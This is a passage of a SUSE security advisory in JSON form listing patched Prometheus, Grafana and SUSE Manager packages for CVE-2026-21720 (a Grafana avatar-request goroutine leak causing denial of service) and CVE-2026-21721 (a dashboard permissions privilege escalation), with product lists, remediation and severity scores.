"text": "Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine blocks forever trying to send on an unbuffered channel. Sustained traffic with random hashes keeps tripping this timeout, so goroutine count grows linearly, eventually exhausting memory and causing Grafana to crash on some systems.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-21720",
"url": "https://www.suse.com/security/cve/CVE-2026-21720"
},
{
"category": "external",
"summary": "SUSE Bug 1257349 for CVE-2026-21720",
"url": "https://bugzilla.suse.com/1257349"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2026-21720"
},
{
"cve": "CVE-2026-21721",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-21721"
}
],
"notes": [
{
"category": "general",
"text": "The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization-internal privilege escalation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
